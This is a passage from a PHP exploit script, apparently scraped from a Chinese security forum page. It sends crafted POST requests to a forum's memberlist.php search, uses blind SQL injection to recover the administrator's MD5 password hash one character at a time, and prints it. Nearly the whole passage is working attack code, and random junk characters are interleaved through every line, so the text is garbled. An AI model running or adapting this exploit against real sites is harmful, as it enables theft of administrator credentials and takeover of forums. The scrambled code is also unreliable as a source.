$data.="&amp;search_group_id=0";
8 ?2 B! r3 q6 ]  o1 @$data.="&amp;submit=Search";
& P% k2 \) ^, r* T5 Z$packet="POST ".$p."memberlist.php?joined_select=lt&amp;active_selec t=lt&amp;count_select=eq&amp;sk=c&amp;sd=a&amp;ip=%5C%27&amp;form=post &amp;field=username_list&amp;mode=searchuser&amp;form=post HTTP/1.0
8 _' O$ ?& B# K"; 2 L& {* K. m7 o; _  N  A- P2 R
$packet.="Content-Type: application/x-www-form-urlencoded
) T2 K- K% N- O"; " h" \1 L7 ^9 g
$packet.="Host: ".$host."5 V4 f% V1 {9 S" Z! W' |, I7 p* i
";
! L% V+ x+ \5 a) T  X$packet.="Content-Length: ".strlen($data)."
% [  M9 a  b! M, `- I+ D7 Q% v";
0 h+ c/ I  X2 v; u; r$packet.="Connection: Close, o: v& k% S) J
"; " i9 _% K- b. m1 e# |3 v. A7 d9 i# Y
$packet.="Cookie: ".$cookie." 2 c- I6 L6 E) `  c) D1 V3 `

0 ~0 M) R; }9 A";
: \4 Q$ X8 @5 Q6 f$packet.=$data; 1 c" @  u7 |% P$ c; ^3 _
sendpacketii($packet);
3 e4 ^; r7 ^8 h2 G2 @if (!strstr($html,"No members found for this search criteria")) {$admin.=chr($i);echo "password -> ".$admin."[???]
, c+ N0 @7 U3 f) }3 d' E";sleep(2);break;} ! R9 r; s5 f% T3 f+ h/ I
}
" e: `5 R& _6 ?) D) Jif ($i==255) {die("Exploit failed...");}
: m7 h( M- r$ Z. T% U+ B/ j/ M$j++; 6 A6 |3 d4 K3 q3 ?
}
! s; h; t. r9 O. T' yecho "--------------------------------------------------------------------$ k5 E9 g* v; f% p! \, _5 W: v
";
$ `  X" I2 F% S3 xecho "admin -> ".$admin."
! c4 p6 r; s+ ^7 l. F( v- V0 j% `, g"; . r' K  q% S3 i& j* m" }: \8 e$ i! W
echo "password (md5) -> ".$password."
$ P/ Y# ]5 {6 {- S: Q2 V9 e";
# p- ~' g) P6 {" q3 ?; Recho "--------------------------------------------------------------------8 |. F! |3 C* I5 i( H1 w
";
4 g; v* v* J( p  s" {# Yfunction is_hash($hash) - T, ?) m% V1 V! \4 w6 ]
{
$ _" ^' O. X: l3 aif (ereg("^[a-f0-9]{32}",trim($hash))) {return true;} - L( m# S4 Z8 C6 `# T
else {return false;}
) D0 Y9 |1 c$ C. o$ M9 k( t$ `} 2 g7 W, ?0 l3 G7 C) H; k
if (is_hash($password)) {echo "Exploit succeeded...";}
, V+ h- b6 r7 H# ]else {echo "Exploit failed...";} 6 A* n! Z. e9 V4 N% v1 `$ Q
?>. [7 B  [# `5 F. x$ E7 O5 a

  d$ h" m8 ^' e' d3 u3 z* K9 J) s! W6 @; I8 M6 _
* x# V6 E  b5 Z' i+ a+ D" S
, s/ U0 m4 k: @" t$ R! M

9 b0 G* b$ v' m  X& }: m& O/ }" r
7 y- t3 R4 k+ O) d) }4 Q! x! z& p4 `# u2 B( h$ f# |* ?2 X* K$ l

5 q' e, D8 U- S. c' U& d2 D) n+ |8 s3 H8 C' w" t  i) w1 _* j
9 n: e. `. w8 g( M- Y/ k

7 F" N, U: X1 _' C& j. U. [) t4 D/ r" h

% g; a6 l. O9 b3 ?! J& p
7 ^- a9 q" [' R$ S3 k8 `* `! ?; W& [2 V0 X. V

4 ~6 `3 a5 I8 t
9 B! s8 G5 \$ f) V
6 {$ `8 D* N5 U公告:https://www.sitedirsec.com公布最新漏洞,请关注




欢迎光临 非安全中国网-官方论坛{sitedirsec} (http://sitedirsec.com/) Powered by Discuz! 7.2